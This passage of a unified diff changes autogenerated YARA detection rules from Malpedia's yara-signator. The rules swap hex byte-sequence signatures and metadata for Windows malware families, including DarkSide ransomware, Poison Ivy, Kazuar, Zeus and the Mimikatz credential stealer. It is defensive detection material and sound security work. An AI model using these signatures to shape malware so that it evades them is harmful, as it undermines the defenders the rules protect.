-		$sequence_0 = { ff7508 e8???????? 89c7 6a00 }
-		$sequence_1 = { 57 be19000200 8d45fc 50 56 }
-		$sequence_2 = { 40 803c0100 75f9 6a01 50 }
-		$sequence_3 = { f7e7 8945f0 50 e8???????? 89c3 81e3ff000000 89de }
-		$sequence_4 = { eb03 31c0 40 5f 5e c9 }
-		$sequence_5 = { 89c7 6a00 6a00 56 53 57 }
-		$sequence_6 = { 83c41c 89c7 09ff 7507 31c0 }
-		$sequence_7 = { 31c9 8b442408 8a140e 881408 803c0e00 }
-		$sequence_8 = { eb3a ff7518 ff7514 ff751c 6a00 }
-		$sequence_9 = { 6a00 68???????? e8???????? 89c7 09ff }
+		$sequence_0 = { 85c0 740e 85ed 740a }
+		$sequence_1 = { ff15???????? 85c0 7407 3d14270000 }
+		$sequence_2 = { 3c78 7404 3c58 7505 bb01000000 }
+		$sequence_3 = { e8???????? 83f8ff 7407 3d0000a000 }
+		$sequence_4 = { 7408 3c0d 7404 3c0a 7516 }
+		$sequence_5 = { 83f801 740e 83f803 7409 83f802 }
+		$sequence_6 = { 3c09 7408 3c0d 7404 3c0a 7516 }
+		$sequence_7 = { 7404 3c58 7505 bb01000000 }
+		$sequence_8 = { 740c 3c09 7408 3c0d 7404 3c0a 7516 }
+		$sequence_9 = { 3c0d 7404 3c0a 7516 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 1564672
 }
-rule MALPEDIA_Win_Darkside_Auto : FILE
+rule MALPEDIA_Win_Poison_Ivy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "78d056bd-691e-5837-8a3e-d494c36948d5"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkside_auto.yar#L1-L121"
+		id = "ec8c2f98-412f-543c-9758-b1aacde91b4e"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poison_ivy_auto.yar#L1-L91"
 		license_url = "N/A"
-		logic_hash = "6b8e9b7a9d216743f758468d2821e935f995800b913ca32663480c8ad049b99d"
+		logic_hash = "431acfd8496c54390529508a28488eb12118d11f97e2de9a76cce0e819bacb59"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 5b 5d c20c00 55 }
-		$sequence_1 = { 81c7ff000000 4b 85db 75ea 85d2 7407 }
-		$sequence_2 = { 7306 fec1 75da eb06 33db fec1 }
-		$sequence_3 = { 57 b9f0000000 be???????? 8b4508 }
-		$sequence_4 = { 81eb10101010 81ef10101010 83e910 79d5 33d2 33c9 8b750c }
-		$sequence_5 = { 59 5b 5d c20800 55 8bec 53 }
-		$sequence_6 = { 83e910 79d5 33d2 33c9 8b750c 33db }
-		$sequence_7 = { 4b 85db 75ea 85d2 7407 }
-		$sequence_8 = { 83e910 79d5 33d2 33c9 8b750c }
-		$sequence_9 = { 893c0e 81ea10101010 2d10101010 81eb10101010 81ef10101010 83e910 }
+		$sequence_0 = { ff9681000000 80beaf08000001 7507 b902000080 eb05 }
+		$sequence_1 = { b902000080 eb05 b901000080 8d45fc }
+		$sequence_2 = { 51 ff5635 68ff000000 8d86b1060000 }
+		$sequence_3 = { 50 6a01 6a00 8d86120e0000 50 ff75fc }
+		$sequence_4 = { b901000080 8d45fc 50 683f000f00 6a00 57 51 }
+		$sequence_5 = { 51 57 ff9681000000 8d45fc }
+		$sequence_6 = { 8d86120e0000 50 ff75fc ff563d ff75fc ff5631 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Coreshell_Auto : FILE
+rule MALPEDIA_Win_Kazuar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "27d46fdb-7250-5f28-b02a-5095dbf27fe3"
+		id = "e7b5f37c-6bd5-5a21-b802-031d3d305256"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coreshell_auto.yar#L1-L449"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kazuar_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "038145c7338b3ef0cec3ae46e0288d3925695dd56d293f3ab89cfa76d758deaa"
+		logic_hash = "02ddda00d237d685622ba3fe593a517532f67079f8df3124667eb63da629b240"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91140,74 +91501,32 @@ rule MALPEDIA_Win_Coreshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { be06000000 e8???????? 85c0 7401 4e 68c0270900 }
-		$sequence_1 = { 56 ff15???????? 83c40c 3bc6 }
-		$sequence_2 = { 68???????? 52 ffd7 ffd0 }
-		$sequence_3 = { 56 6810270000 ff15???????? be06000000 }
-		$sequence_4 = { 50 ff15???????? 83c404 32db }
-		$sequence_5 = { 6804010000 6a08 8b15???????? 52 }
-		$sequence_6 = { 57 6a08 51 ff15???????? 8bf8 85ff 750a }
-		$sequence_7 = { 8b0d???????? 8b15???????? 6a01 51 68???????? 52 }
-		$sequence_8 = { 6a00 ff15???????? 8bf0 ff15???????? 50 }
-		$sequence_9 = { 56 6a00 6a00 681c800000 }
-		$sequence_10 = { 8d041e 50 57 6a08 }
-		$sequence_11 = { c20400 50 a1???????? 6a00 }
-		$sequence_12 = { 68???????? 50 a3???????? ffd6 a3???????? a1???????? 68???????? }
-		$sequence_13 = { 8d4c2400 56 51 6a00 }
-		$sequence_14 = { 8bf1 8b4604 85c0 7407 50 ff15???????? 8b36 }
-		$sequence_15 = { e8???????? 85c0 7402 eb14 c745f000000000 }
-		$sequence_16 = { eb14 c745f000000000 68e0930400 ff15???????? }
-		$sequence_17 = { ff15???????? ffd0 85c0 7508 ff15???????? }
-		$sequence_18 = { 50 ffd6 6a00 6a00 6a00 68???????? 6a00 }
-		$sequence_19 = { 68???????? 6800080000 8d85fcefffff 50 ff15???????? }
-		$sequence_20 = { 8b0d???????? 52 50 57 68???????? 51 }
-		$sequence_21 = { a1???????? 68???????? 50 ffd6 6a00 }
-		$sequence_22 = { ff15???????? 53 6a06 6a03 53 53 }
-		$sequence_23 = { 50 68???????? 68???????? 8985f0fdffff }
-		$sequence_24 = { 8d55f0 52 e8???????? 83c408 33c0 8b4df0 64890d00000000 }
-		$sequence_25 = { ff15???????? 50 68???????? 6800080000 }
-		$sequence_26 = { 81e1ffff0000 81e1ffff0000 81e1ff000000 81e1ff000000 }
-		$sequence_27 = { ff15???????? 0fb6cb 03cf 880431 fec3 }
-		$sequence_28 = { 52 a1???????? 50 68???????? 8b0d???????? 51 ff15???????? }
-		$sequence_29 = { 51 ff15???????? ffd0 8945fc }
-		$sequence_30 = { 56 51 56 6a01 }
-		$sequence_31 = { ba00080000 2bd0 52 8d85fcefffff }
-		$sequence_32 = { 51 ff15???????? 83c414 8d95f4fdffff 52 ff15???????? }
-		$sequence_33 = { e8???????? 8be8 8b442410 50 e8???????? }
-		$sequence_34 = { 6888130000 ff15???????? c745f000000000 c745f400000000 }
-		$sequence_35 = { 8d8dfcefffff 51 ff15???????? ba00080000 2bd0 }
-		$sequence_36 = { 81e2ffff0000 81e2ffff0000 c1ea08 81e2ff000000 }
-		$sequence_37 = { 68???????? ff35???????? ff15???????? 0305???????? 50 ff15???????? a1???????? }
-		$sequence_38 = { ffd6 ffd0 68???????? a3???????? }
-		$sequence_39 = { bf04010000 57 6a08 ff35???????? }
-		$sequence_40 = { 8908 8b15???????? 89d6 81c609000000 }
-		$sequence_41 = { 8908 8b00 8b5004 8b35???????? }
-		$sequence_42 = { 8908 813800000000 0f95c2 8b35???????? 8b3d???????? }
-		$sequence_43 = { 29d6 01f0 a3???????? e9???????? }
-		$sequence_44 = { a3???????? ffd7 8bd8 68???????? 53 ffd6 }
-		$sequence_45 = { 29d6 0faff0 31d2 f7f6 }
-		$sequence_46 = { 5f 5b 5d c3 b81c000000 }
-		$sequence_47 = { 6689fb 0fb7fb c1ef08 81e7ff000000 }
-		$sequence_48 = { 68???????? 53 a3???????? ffd6 a3???????? 68???????? }
-		$sequence_49 = { 5f 5d c3 89e0 c70010270000 }
-		$sequence_50 = { 53 a3???????? ffd6 68???????? a3???????? ffd7 8bd8 }
-		$sequence_51 = { 57 8b3d???????? 68???????? ffd7 8b35???????? 68???????? }
+		$sequence_0 = { 8b4624 4801db 4c01db 0fb71403 8b461c 498d1493 }
+		$sequence_1 = { 751c 8b4624 4801db 4c01db 0fb71403 8b461c }
+		$sequence_2 = { 4489c8 410fbe0c02 84c9 7417 e8???????? }
+		$sequence_3 = { 53 4881ec30010000 31c9 41b804010000 }
+		$sequence_4 = { eb07 48ffc3 ebc8 31c0 4883c420 5b 5e }
+		$sequence_5 = { 4883ec28 e8???????? ba44a73378 4889c1 }
+		$sequence_6 = { 31c9 41b804010000 488d5c242c 4889da ff15???????? }
+		$sequence_7 = { 7428 4989db 498b4b40 e8???????? }
+		$sequence_8 = { 31c9 41b804010000 488d5c242c 4889da }
+		$sequence_9 = { 4889c1 4989c0 e8???????? 4c8d4c2428 31d2 31c9 01c0 }
 
 	condition:
-		7 of them and filesize < 303100
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Anel_Auto : FILE
+rule MALPEDIA_Win_Hui_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "953c8e23-a017-5b2f-ada2-2a862edfbe44"
+		id = "175084ea-2a45-5f42-bda4-3cc233036dd9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anel_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hui_loader_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "3d1ba89860b52bc0dc01f6c2b2044c292ec3a194dda9499e849b870d6aa20608"
+		logic_hash = "96ca3a225904ad2e70a598c1b3c7fa88d26822a60a6742e1663517bed35c0526"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91221,34 +91540,34 @@ rule MALPEDIA_Win_Anel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ff 8db50cffffff e8???????? 6a01 8db5f0feffff e8???????? 6a01 }
-		$sequence_1 = { 8b45d4 7303 8d45d4 8b4de4 50 8d852cffffff }
-		$sequence_2 = { 0394b8480c0000 8b4dfc 334844 335040 8bc1 335508 c1e818 }
-		$sequence_3 = { e8???????? 8bd8 8b8504ffffff c645fc0b e8???????? 33db 43 }
-		$sequence_4 = { 668945d6 6a69 58 6a6e 668945d8 58 6a67 }
-		$sequence_5 = { ffb5606ffeff ffd6 85c0 75c0 8d85646ffeff 50 ff95506ffeff }
-		$sequence_6 = { 6a00 8bc6 e8???????? 84c0 7439 837e1408 7204 }
-		$sequence_7 = { c20800 68???????? e8???????? cc 6a50 b8???????? e8???????? }
-		$sequence_8 = { 51 50 e8???????? 8b44244c 894604 }
-		$sequence_9 = { 0f8e89000000 8b7510 85f6 7e62 ff7514 8d45f8 57 }
+		$sequence_0 = { 68???????? 51 8bf8 ffd5 8d9424b8010000 8d842488090000 }
+		$sequence_1 = { ffd0 68e8030000 ffd6 8b0d???????? 51 ff15???????? 5f }
+		$sequence_2 = { 8b1402 3bd3 7406 c70109000000 }
+		$sequence_3 = { 83e01f c1f905 8d04c0 8b0c8d60e20010 8d44810c 50 }
+		$sequence_4 = { 52 50 a3???????? ff15???????? a1???????? }
+		$sequence_5 = { 83c628 83f90a 7cd9 33d2 }
+		$sequence_6 = { 8d4a01 0338 83c004 49 75f8 42 83c628 }
+		$sequence_7 = { c20400 8b15???????? 33c0 68???????? 52 }
+		$sequence_8 = { ff15???????? a3???????? 33ff 8d4c2428 }
+		$sequence_9 = { 7e0f 8b4efc 8b5401fc 031401 8b0e 891401 }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Kikothac_Auto : FILE
+rule MALPEDIA_Win_Microcin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d385826e-58d3-5814-919d-ec257a5aa756"
+		id = "e3018704-b085-5615-9047-7419a64c6b42"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kikothac_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.microcin_auto.yar#L1-L451"
 		license_url = "N/A"
-		logic_hash = "44c91c13eb1dd4a6656263ce0b69b86cf3ff2448fb7726df446bdef3b4382332"
+		logic_hash = "ce937d5b0febb8a0ef0b69b389b9ac6e2a402988a44ce06e021321112f9c236c"
 		score = 75
-		quality = 75
+		quality = 44
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91260,34 +91579,74 @@ rule MALPEDIA_Win_Kikothac_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 68???????? 6802000080 c7450c00000000 ff15???????? 85c0 753a }
-		$sequence_1 = { 884c240c 9c 89542438 c6042486 }
-		$sequence_2 = { 10c6 f5 8b5504 f8 e9???????? 9c 60 }
-		$sequence_3 = { 66d3cd 894c2420 6897d1eb0f f5 6895c1b1d4 c744242400000000 66c704240957 }
-		$sequence_4 = { 53 56 c745e890024100 894dec 894df0 380d???????? 746f }
-		$sequence_5 = { 8b15???????? 50 51 52 ff15???????? 8b06 8b10 }
-		$sequence_6 = { 56 33c0 68fe070000 50 8d8d02f8ffff 51 }
-		$sequence_7 = { e9???????? 0fb6d2 fec8 882424 c0c004 f7da 660fb3ca }
-		$sequence_8 = { f9 83c502 f5 9c 0fa5d0 ff74241c }
-		$sequence_9 = { 85c0 7644 3d00040000 760d b800040000 8d4df4 }
+		$sequence_0 = { 48895c2410 55 488dac2440feffff 4881ecc0020000 488b05???????? 4833c4 }
+		$sequence_1 = { 8d45ac 50 6801000080 ff15???????? }
+		$sequence_2 = { ff15???????? 4863c8 c6840d8002000075 488d8d80020000 }
+		$sequence_3 = { 7515 c74424484c773373 c744244c31674d5a e9???????? c744244849734541 }
+		$sequence_4 = { 4533c9 33d2 498d4e70 ff15???????? 85c0 }
+		$sequence_5 = { 85c0 0f8599000000 33d2 41b810020000 }
+		$sequence_6 = { b9ff030000 2bc8 4863d1 4883ea02 }
+		$sequence_7 = { 897e04 5b 5f 5e 5d c20400 55 }
+		$sequence_8 = { 7e18 80bc35a8feffff3a 741f 8d85a8feffff 46 }
+		$sequence_9 = { c6840d7002000062 488d8d70020000 ff15???????? 4863c8 }
+		$sequence_10 = { 8d85f8feffff 6804010000 50 ff15???????? 8d85f8feffff }
+		$sequence_11 = { 6a10 50 56 ff15???????? 85c0 0f45f7 }
+		$sequence_12 = { 894620 c7462406000000 33c0 48894638 48894630 }
+		$sequence_13 = { 68ffff0000 56 8b35???????? ffd6 6a04 }
+		$sequence_14 = { ff75d4 e8???????? 83c40c 8bc7 }
+		$sequence_15 = { 50 ffd3 85c0 7e18 80bc35a8feffff3a }
+		$sequence_16 = { 752a 4c8d0502130100 8bd7 498bcd e8???????? 85c0 7415 }
+		$sequence_17 = { 4c8d0535120100 33c0 498bd0 3b0a 740e ffc0 }
+		$sequence_18 = { 41bc14030000 4c8d0574130100 488bcd 418bd4 e8???????? }
+		$sequence_19 = { 83bc9578feffff00 7d34 8b857cffffff 8b8c8578feffff 83c104 8b957cffffff 898c9578feffff }
+		$sequence_20 = { 4053 4883ec20 8bd9 488d0d950c0100 }
+		$sequence_21 = { b905000000 f7f1 85d2 750b ff15???????? }
+		$sequence_22 = { fa fa fa fa fa fa }
+		$sequence_23 = { 53 53 56 43 }
+		$sequence_24 = { 83f831 7d5c 8b4df4 034df8 }
+		$sequence_25 = { 89857cffffff 83bd7cffffff20 0f8daf000000 8b8d7cffffff 8b957cffffff 8b448d80 2b8495f8feffff }
+		$sequence_26 = { 636373 7673 6873742e65 7865 }
+		$sequence_27 = { 751a 488d15f8110100 41b810200100 488bcd e8???????? }
+		$sequence_28 = { 7370 696465726167656e 742e 657865 }
+		$sequence_29 = { 8b8d78dfffff 83c103 8b9578dfffff 890c95003c4100 }
+		$sequence_30 = { 33c0 39b8283a4100 0f8491000000 ff45e4 83c030 }
+		$sequence_31 = { 0fb645fb 99 b903000000 f7f9 85d2 751d }
+		$sequence_32 = { 4889742420 e8???????? cc 4c8d056c120100 498bd4 488bcd }
+		$sequence_33 = { 6828010000 8d85ccfeffff 6a00 50 }
+		$sequence_34 = { 498bcd e8???????? 4c8d05b7120100 41b903000000 488d4c45bc 488bc1 }
+		$sequence_35 = { 6e 7669 726f 6e 6d 656e 7400 }
+		$sequence_36 = { 4885c0 7419 488d15730c0100 488bc8 }
+		$sequence_37 = { 33c0 eb42 8b4df0 e8???????? 8d45f8 50 6a00 }
+		$sequence_38 = { 0fb785d4f4ffff 50 8d85e8f4ffff 68???????? 50 }
+		$sequence_39 = { 50 ff15???????? 8d85c8feffff 6a00 6880000000 6a04 }
+		$sequence_40 = { ffd3 f7d8 1bc0 f7d8 5f 5e 5b }
+		$sequence_41 = { e8???????? 8d442464 83c40c 89442434 8d44240c }
+		$sequence_42 = { 8b9504010000 48 63d2 48 03c2 8b9504010000 48 }
+		$sequence_43 = { 89d5 ba67676767 45 89cf 45 89c6 49 }
+		$sequence_44 = { 6a00 57 ff15???????? 8b1d???????? c705????????01000000 6a00 6a00 }
+		$sequence_45 = { 8b55e4 83c40c 6bd230 8d82c0d34000 }
+		$sequence_46 = { 75e4 56 ffd3 33c0 }
+		$sequence_47 = { 85c0 0f84ed000000 8b3d???????? 50 6a08 ffd7 8b1d???????? }
+		$sequence_48 = { e9???????? 48 8d6570 5d c3 5b 48 }
+		$sequence_49 = { 8b5664 8d4c1105 8908 68ebeeebee ff7658 e8???????? }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Zeus_Auto : FILE
+rule MALPEDIA_Win_Misha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4fe3f9dd-2485-552f-9a89-ff72673ef49c"
+		id = "ae44f4ed-6b62-5739-afcc-3910b944ad53"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_auto.yar#L1-L222"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.misha_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "5c96f3aec91f480609a26c2c5106b944c5143184de972e1c667aa8b1ec8b4815"
+		logic_hash = "6808e3992c1a57c6f785e40da9dc7940883a56816b3304928fa690c0fc154801"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91299,47 +91658,34 @@ rule MALPEDIA_Win_Zeus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb58 833f00 7651 8b5f08 }
-		$sequence_1 = { eb06 66a1???????? 68???????? 668906 6a00 8d45fc e8???????? }
-		$sequence_2 = { c9 c3 83f903 7515 }
-		$sequence_3 = { 8d443604 50 a1???????? 57 6a01 6a00 }
-		$sequence_4 = { 80f93f 740a 80f92f 7405 4e }
-		$sequence_5 = { c9 c3 6a1c 58 e8???????? 85c0 7406 }
-		$sequence_6 = { 8b3d???????? 3bfe 744f 56 }
-		$sequence_7 = { 84db 742a ff75f8 ff75f0 ff7510 ff750c }
-		$sequence_8 = { 8bf3 6810270000 ff35???????? ff15???????? }
-		$sequence_9 = { 891d???????? 891d???????? ffd6 68???????? }
-		$sequence_10 = { e8???????? 84c0 7442 6a10 }
-		$sequence_11 = { 8d8db0fdffff e8???????? 8ad8 84db }
-		$sequence_12 = { ff15???????? 5e 8ac3 5b c20800 55 }
-		$sequence_13 = { c9 c20400 55 8bec f6451802 }
-		$sequence_14 = { 7506 b364 6a14 eb18 81fb5a5c4156 }
-		$sequence_15 = { b8d5000000 e8???????? 68e6010000 68???????? 6809080002 8bc6 }
-		$sequence_16 = { e8???????? 84c0 0f84ac000000 b809080002 3945f4 }
-		$sequence_17 = { 8b1b 81f309080002 81fb5d515047 7410 81fb4f4d4156 7408 }
-		$sequence_18 = { 5b 8bc6 c745f809080002 e8???????? 8ad8 }
-		$sequence_19 = { 0f86e3000000 8b03 3509080002 3d5c5b4550 740b 3d59495351 }
-		$sequence_20 = { 6809080002 8bc6 50 8d45fc 50 e8???????? }
-		$sequence_21 = { 57 33f6 56 50 68???????? }
-		$sequence_22 = { b809080002 3945f4 7713 807d0801 0f8598000000 }
+		$sequence_0 = { e8???????? ff7508 8d45e8 50 e8???????? 83c414 eb02 }
+		$sequence_1 = { 8b45b8 8945c0 8b45b8 8945c8 c645df01 eb04 c645df01 }
+		$sequence_2 = { eb04 8b542410 0fb64c240c 8bc1 4a 48 7422 }
+		$sequence_3 = { a5 a5 8b450c c780f800000004000000 8b450c c780f400000001000000 }
+		$sequence_4 = { c3 55 8bec 81ec10020000 ff750c }
+		$sequence_5 = { eb43 837d1400 7421 ff7518 ff7514 ff7510 }
+		$sequence_6 = { 397d0c 7456 57 57 ff750c ff7508 }
+		$sequence_7 = { 2b4508 f7d8 48 e9???????? 837d1800 7419 }
+		$sequence_8 = { c78550feffff18181818 c78554feffff18181818 c78558feffff18181819 c7855cfeffff19191919 c78560feffff19191919 c78564feffff19191919 c78568feffff19191919 }
+		$sequence_9 = { ff75dc 6a08 59 e8???????? 83c420 0fb6c0 85c0 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 710656
 }
-rule MALPEDIA_Win_Kapeka_Auto : FILE
+rule MALPEDIA_Win_Mimikatz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9faddcc-105b-5a04-b8c8-ec1325abdf07"
+		id = "7f63ff96-1e0a-5197-8a45-285738861f05"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kapeka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kapeka_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mimikatz_auto.yar#L1-L204"
 		license_url = "N/A"
-		logic_hash = "f9f8a4abde4cdfc67b53dadf6bbb3bb8155ff6c1c3c5e817a852cd16859c5b00"
+		logic_hash = "55557ae737b34b617581092058134efff316e946e4bd0657345c0e9223ab37a5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91351,32 +91697,44 @@ rule MALPEDIA_Win_Kapeka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 448b642424 be16000000 448d76eb 488b4b70 488d542420 488b01 }
-		$sequence_1 = { 488bd8 e8???????? 488d8c2480000000 4533c9 48894c2428 4533c0 498b0e }
-		$sequence_2 = { 4885c0 0f8422050000 4889b42460010000 4c8d2d71a10000 498bcd 4c89a42470010000 4c89bc2430010000 }
-		$sequence_3 = { 397537 7549 0f1045d7 0f1145e7 488b4de7 6690 0fb701 }
-		$sequence_4 = { 44335e08 4533da 4133fb 44895840 448bd7 897844 4533d1 }
-		$sequence_5 = { c744242019010200 4c8d451f 48c7c102000080 488d55f7 e8???????? }
-		$sequence_6 = { 48f7e1 8bc7 48c1ea1f 480fafd7 482bca 2bc1 4181f8fdffff7f }
-		$sequence_7 = { 488bd9 488901 33ff 488b4928 4885c9 740a }
-		$sequence_8 = { 4885c9 7406 ff15???????? 488b5e18 488d4e20 e8???????? 488bd3 }
-		$sequence_9 = { 41b802000000 488d95b0010000 488d8d00010000 e8???????? 488d8d28010000 e8???????? 488d0dc0650100 }
+		$sequence_0 = { f7f1 85d2 7406 2bca }
+		$sequence_1 = { 83f8ff 750e ff15???????? c7002a000000 }
+		$sequence_2 = { e8???????? 894720 85c0 7413 }
+		$sequence_3 = { ff15???????? b9e9fd0000 8905???????? ff15???????? }
+		$sequence_4 = { c3 81f998000000 7410 81f996000000 7408 81f99b000000 }
+		$sequence_5 = { 83f812 72f1 33c0 c3 }
+		$sequence_6 = { ff5028 8be8 85c0 787a }
+		$sequence_7 = { f30f6f4928 f30f7f8c24a0000000 f30f6f4138 f30f7f8424b8000000 }
+		$sequence_8 = { 6683f83f 7607 32c0 e9???????? }
+		$sequence_9 = { 66894108 33c0 39410c 740b }
+		$sequence_10 = { ff15???????? b940000000 8bd0 89442430 }
+		$sequence_11 = { e8???????? 8bf8 85f6 787a 813d????????401f0000 }
+		$sequence_12 = { 2bc1 85c9 7403 83c008 }
+		$sequence_13 = { 3c02 7207 e8???????? eb10 }
+		$sequence_14 = { a3???????? a1???????? c705????????cf2f4000 8935???????? }
+		$sequence_15 = { 888898d34600 40 ebe9 33c0 8945e4 3d00010000 7d10 }
+		$sequence_16 = { 57 e8???????? 8bf0 83c410 85f6 7415 }
+		$sequence_17 = { 6a08 68???????? e8???????? 68???????? ff15???????? 8b7508 c7465c907f4000 }
+		$sequence_18 = { 39b8a8d54600 0f8491000000 ff45e4 83c030 }
+		$sequence_19 = { 81ca00ffffff 42 0fb692b0e74600 321437 }
+		$sequence_20 = { 8b4508 ff34c530d94600 ff15???????? 5d c3 6a0c 68???????? }
+		$sequence_21 = { 0fb6c8 51 e8???????? 83c404 85c0 7510 }
 
 	condition:
-		7 of them and filesize < 377856
+		7 of them and filesize < 1642496
 }
-rule MALPEDIA_Win_Neconyd_Auto : FILE
+rule MALPEDIA_Win_Buzus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2815a16-95e0-5db4-9058-3189995786c2"
+		id = "f2c6c20b-b508-5a77-9b4a-9c4e0b2d073d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neconyd"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neconyd_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buzus_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "e1fd880f0f7b560832efc4f24d502d458a46d62299fa6f4e05fae094662862d2"
+		logic_hash = "8e43adb8c81d9beeeff3e46894b189cae5a523720c80cbd55f0f1970ef5f7600"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91390,32 +91748,32 @@ rule MALPEDIA_Win_Neconyd_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 56 56 56 8945f4 56 }
-		$sequence_1 = { 85c0 7509 57 ff15???????? ebc6 6aff 57 }
-		$sequence_2 = { 8bd8 ffd7 2bc3 3bc6 7340 }
-		$sequence_3 = { 8d4c2418 e8???????? 83f8ff 8944241c 0f84e6010000 6826060000 }
